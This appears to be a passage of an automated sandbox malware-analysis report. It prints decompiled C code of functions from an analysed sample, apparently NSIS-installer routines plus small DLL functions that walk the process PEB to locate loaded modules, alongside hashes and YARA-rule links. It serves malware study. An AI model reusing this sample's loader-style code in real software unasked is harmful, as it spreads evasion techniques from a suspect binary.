                                                                                            • Opcode ID: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                                                                                            • Instruction ID: 2fa80b96e0c3f2f9afba8e6e6bfd5b6e13d9d39ff7e82b1c07230a33620f403b
                                                                                            • Opcode Fuzzy Hash: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                                                                                            • Instruction Fuzzy Hash: 5BE1797190070ADFDB24CF58C980BAEBBF5EB45305F15892EE897A7291D338A991CF14
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00406B2B, Relevance: .3, Instructions: 300COMMONCrypto
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00406B2B(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42ceb8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42ceb8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42ceb8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                                            0x00406b36
                                                                                            0x00406b3e
                                                                                            0x00406b42
                                                                                            0x00406b44
                                                                                            0x00406b47
                                                                                            0x00406b49
                                                                                            0x00406b49
                                                                                            0x00406b4b
                                                                                            0x00406b52
                                                                                            0x00406b54
                                                                                            0x00406b54
                                                                                            0x00406b5a
                                                                                            0x00406b6f
                                                                                            0x00406b77
                                                                                            0x00406b79
                                                                                            0x00406b7b
                                                                                            0x00406b7e
                                                                                            0x00406b7f
                                                                                            0x00406b7f
                                                                                            0x00406b85
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406b87
                                                                                            0x00406b8a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406b8a
                                                                                            0x00406b8e
                                                                                            0x00406b91
                                                                                            0x00406b93
                                                                                            0x00406b93
                                                                                            0x00406b96
                                                                                            0x00406b9c
                                                                                            0x00406b9d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406b9d
                                                                                            0x00406ba2
                                                                                            0x00406ba5
                                                                                            0x00406ba7
                                                                                            0x00406ba7
                                                                                            0x00406bad
                                                                                            0x00406baf
                                                                                            0x00406bc0
                                                                                            0x00406bb3
                                                                                            0x00406bb7
                                                                                            0x00406e5c
                                                                                            0x00000000
                                                                                            0x00406e5c
                                                                                            0x00406bbd
                                                                                            0x00406bbe
                                                                                            0x00406bbe
                                                                                            0x00406bc6
                                                                                            0x00406bc9
                                                                                            0x00406bcd
                                                                                            0x00406bcf
                                                                                            0x00406bd1
                                                                                            0x00406bd4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406bdc
                                                                                            0x00406be2
                                                                                            0x00406be4
                                                                                            0x00406be6
                                                                                            0x00406be7
                                                                                            0x00406bfc
                                                                                            0x00406bfc
                                                                                            0x00406bff
                                                                                            0x00406c01
                                                                                            0x00406c01
                                                                                            0x00406c03
                                                                                            0x00406c08
                                                                                            0x00406c0a
                                                                                            0x00406c11
                                                                                            0x00406c13
                                                                                            0x00406c1b
                                                                                            0x00406c1b
                                                                                            0x00406c1d
                                                                                            0x00406c1e
                                                                                            0x00406c2d
                                                                                            0x00406c31
                                                                                            0x00406c35
                                                                                            0x00406c38
                                                                                            0x00406c3b
                                                                                            0x00406c40
                                                                                            0x00406c43
                                                                                            0x00406c49
                                                                                            0x00406c50
                                                                                            0x00406c56
                                                                                            0x00406e4f
                                                                                            0x00406e4f
                                                                                            0x00406e54
                                                                                            0x00406e63
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406e54
                                                                                            0x00406c63
                                                                                            0x00406c66
                                                                                            0x00406c69
                                                                                            0x00406c6c
                                                                                            0x00406c70
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c7b
                                                                                            0x00406c7e
                                                                                            0x00406c7f
                                                                                            0x00406c81
                                                                                            0x00406c87
                                                                                            0x00406c8a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c90
                                                                                            0x00406c91
                                                                                            0x00406c94
                                                                                            0x00406c97
                                                                                            0x00406c9a
                                                                                            0x00406ca0
                                                                                            0x00406ca2
                                                                                            0x00406ca2
                                                                                            0x00406caa
                                                                                            0x00406cae
                                                                                            0x00406cb3
                                                                                            0x00406cd8
                                                                                            0x00406cde
                                                                                            0x00406ce0
                                                                                            0x00406ce2
                                                                                            0x00406ce5
                                                                                            0x00406cee
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406cb5
                                                                                            0x00406cb5
                                                                                            0x00406cbe
                                                                                            0x00406cc2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406cd3
                                                                                            0x00406cd3
                                                                                            0x00406cd6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406cc6
                                                                                            0x00406cc9
                                                                                            0x00406ccb
                                                                                            0x00406ccf
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406cd1
                                                                                            0x00406cd1
                                                                                            0x00000000
                                                                                            0x00406cd3
                                                                                            0x00406cf7
                                                                                            0x00406cfd
                                                                                            0x00406d07
                                                                                            0x00406d09
                                                                                            0x00406d0e
                                                                                            0x00406d10
                                                                                            0x00406d46
                                                                                            0x00406d12
                                                                                            0x00406d12
                                                                                            0x00406d15
                                                                                            0x00406d18
                                                                                            0x00406d22
                                                                                            0x00406d25
                                                                                            0x00406d2c
                                                                                            0x00406d37
                                                                                            0x00406d3e
                                                                                            0x00406d3e
                                                                                            0x00406d48
                                                                                            0x00406d4b
                                                                                            0x00406d4d
                                                                                            0x00406d53
                                                                                            0x00406d53
                                                                                            0x00406d5c
                                                                                            0x00406d5f
                                                                                            0x00406d64
                                                                                            0x00406d73
                                                                                            0x00406d7b
                                                                                            0x00406d80
                                                                                            0x00406da4
                                                                                            0x00406dac
                                                                                            0x00406db0
                                                                                            0x00406db6
                                                                                            0x00406d82
                                                                                            0x00406d90
                                                                                            0x00406d93
                                                                                            0x00406d99
                                                                                            0x00406d99
                                                                                            0x00406dba
                                                                                            0x00406d75
                                                                                            0x00406d75
                                                                                            0x00406d75
                                                                                            0x00406dcb
                                                                                            0x00406dcf
                                                                                            0x00406ddb
                                                                                            0x00406dd6
                                                                                            0x00406dd9
                                                                                            0x00406dd9
                                                                                            0x00406de3
                                                                                            0x00406de8
                                                                                            0x00406df0
                                                                                            0x00406dec
                                                                                            0x00406dee
                                                                                            0x00406dee
                                                                                            0x00406df6
                                                                                            0x00406df8
                                                                                            0x00406dff
                                                                                            0x00406e09
                                                                                            0x00406e13
                                                                                            0x00406e2f
                                                                                            0x00406e33
                                                                                            0x00406c78
                                                                                            0x00406c7e
                                                                                            0x00406c7f
                                                                                            0x00406c81
                                                                                            0x00406c87
                                                                                            0x00406c8a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c8a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406e15
                                                                                            0x00406e15
                                                                                            0x00406e15
                                                                                            0x00406e1a
                                                                                            0x00406e23
                                                                                            0x00406e2c
                                                                                            0x00000000
                                                                                            0x00406e2c
                                                                                            0x00406e39
                                                                                            0x00406e39
                                                                                            0x00406e3c
                                                                                            0x00406e43
                                                                                            0x00406e46
                                                                                            0x00000000
                                                                                            0x00406c69
                                                                                            0x00406be9
                                                                                            0x00406beb
                                                                                            0x00406beb
                                                                                            0x00406bef
                                                                                            0x00406bf2
                                                                                            0x00406bf3
                                                                                            0x00406bf3
                                                                                            0x00000000
                                                                                            0x00406beb
                                                                                            0x00406b5f
                                                                                            0x00406b65
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                                                                            • Instruction ID: 226139066da84df80bc4b15dd4b3e380d67d521acd3bdc5c46ce9393f3ccc406
                                                                                            • Opcode Fuzzy Hash: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                                                                            • Instruction Fuzzy Hash: 8BC13B71A00219CBDF14CF68C4905EEB7B2FF99314F26826AD856BB384D7346952CF94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 72E45786, Relevance: .1, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.279513465.0000000072E45000.00000040.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                            • Associated: 00000000.00000002.279475009.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279483824.0000000072E41000.00000020.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279497203.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279519577.0000000072E47000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                                                                            • Instruction ID: 252618ae8aa1f51c019f3af7bfeb04a77e53b0882d7d161e4dbeeab8203c112c
                                                                                            • Opcode Fuzzy Hash: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                                                                            • Instruction Fuzzy Hash: 4711C672A00205DFCB20DBADE88886EF7FDEF55695B618075FC06D3214EB349E41C660
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 72E45876, Relevance: .0, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.279513465.0000000072E45000.00000040.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                            • Associated: 00000000.00000002.279475009.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279483824.0000000072E41000.00000020.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279497203.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279519577.0000000072E47000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                                                                            • Instruction ID: eead3135129ebd19e800dedd79c16c7b09da06139a491027cf283f22df46c73c
                                                                                            • Opcode Fuzzy Hash: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                                                                            • Instruction Fuzzy Hash: FAE0E5357656099FCB44CBACD981D15B3F8EB2D224B1186A4FD16C77A0EE34EE00DA50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 72E458B4, Relevance: .0, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E72E458B4(void* __ecx, void* __eflags) {
				void* _t10;
				intOrPtr* _t14;
				intOrPtr* _t15;

				_t10 = __ecx;
				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
				_t15 = _t14;
				while(E72E45786( *((intOrPtr*)(_t15 + 0x30)), _t10) != 0) {
					_t15 =  *_t15;
					if(_t15 != _t14) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_t15 + 0x28));
			}






                                                                                            0x72e458c0
                                                                                            0x72e458c2
                                                                                            0x72e458c5
                                                                                            0x72e458c7
                                                                                            0x72e458d5
                                                                                            0x72e458d9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x72e458db
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.279513465.0000000072E45000.00000040.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                            • Associated: 00000000.00000002.279475009.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279483824.0000000072E41000.00000020.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279497203.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279519577.0000000072E47000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                                                            • Instruction ID: 7ff1487a836a90100c407e981555dff4ab122b051161b06f3da03e5fc876cd16
                                                                                            • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                                                            • Instruction Fuzzy Hash: CAE04F327116109BC3219A1DE580942F3EAFBAC2B47299879FC46D3611CA30EC00CA50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 72E45837, Relevance: .0, Instructions: 7COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E72E45837() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                                                                                            0x72e4584a

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.279513465.0000000072E45000.00000040.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                            • Associated: 00000000.00000002.279475009.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279483824.0000000072E41000.00000020.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279497203.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279519577.0000000072E47000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                            • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                                            • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                            • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00403FCB, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204windowstringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 93%
                                                                                            			E00403FCB(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42a080 =  *0x42a080 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EEA(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42dbc0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42ec28, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42ec28, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42a080 != 0) {
						goto L25;
					} else {
						_t112 =  *0x429870 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403EA5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404256();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42e3fc; // 0x51901c
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x42ec58; // 0x517b50
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F97;
				E00403E83(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E83(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403EA5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403EB8(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x42ec30; // 0x5137d0
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x429064 =  *0x429064 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42a080 =  *0x42a080 & 0x00000000;
				return 0;
			}




















                                                                                            0x00403fdb
                                                                                            0x00404101
                                                                                            0x0040415d
                                                                                            0x00404161
                                                                                            0x00404238
                                                                                            0x0040423a
                                                                                            0x0040423a
                                                                                            0x00404240
                                                                                            0x00404240
                                                                                            0x00404243
                                                                                            0x00000000
                                                                                            0x0040424a
                                                                                            0x0040416f
                                                                                            0x00404171
                                                                                            0x0040417b
                                                                                            0x00404186
                                                                                            0x00404189
                                                                                            0x0040418c
                                                                                            0x00404197
                                                                                            0x0040419a
                                                                                            0x004041a1
                                                                                            0x004041af
                                                                                            0x004041c7
                                                                                            0x004041da
                                                                                            0x004041ea
                                                                                            0x004041ec
                                                                                            0x004041ec
                                                                                            0x004041a1
                                                                                            0x004041f6
                                                                                            0x00000000
                                                                                            0x00404201
                                                                                            0x00404205
                                                                                            0x00404216
                                                                                            0x00404216
                                                                                            0x0040421c
                                                                                            0x0040422a
                                                                                            0x0040422a
                                                                                            0x00000000
                                                                                            0x0040422e
                                                                                            0x004041f6
                                                                                            0x0040410c
                                                                                            0x00000000
                                                                                            0x00404120
                                                                                            0x00404126
                                                                                            0x0040412c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404151
                                                                                            0x00404153
                                                                                            0x00404158
                                                                                            0x00000000
                                                                                            0x00404158
                                                                                            0x0040410c
                                                                                            0x00403fe1
                                                                                            0x00403fe4
                                                                                            0x00403fe9
                                                                                            0x00403feb
                                                                                            0x00403ffa
                                                                                            0x00403ffa
                                                                                            0x00403ffc
                                                                                            0x00404001
                                                                                            0x00404004
                                                                                            0x00404006
                                                                                            0x0040400b
                                                                                            0x00404014
                                                                                            0x0040401a
                                                                                            0x00404026
                                                                                            0x00404029
                                                                                            0x00404032
                                                                                            0x00404037
                                                                                            0x0040403a
                                                                                            0x0040403f
                                                                                            0x00404056
                                                                                            0x0040405d
                                                                                            0x00404070
                                                                                            0x00404073
                                                                                            0x00404088
                                                                                            0x0040408a
                                                                                            0x0040408f
                                                                                            0x00404094
                                                                                            0x00404099
                                                                                            0x00404099
                                                                                            0x004040a8
                                                                                            0x004040b7
                                                                                            0x004040b9
                                                                                            0x004040cf
                                                                                            0x004040de
                                                                                            0x004040e0
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • CheckDlgButton.USER32 ref: 00404056
                                                                                            • GetDlgItem.USER32 ref: 0040406A
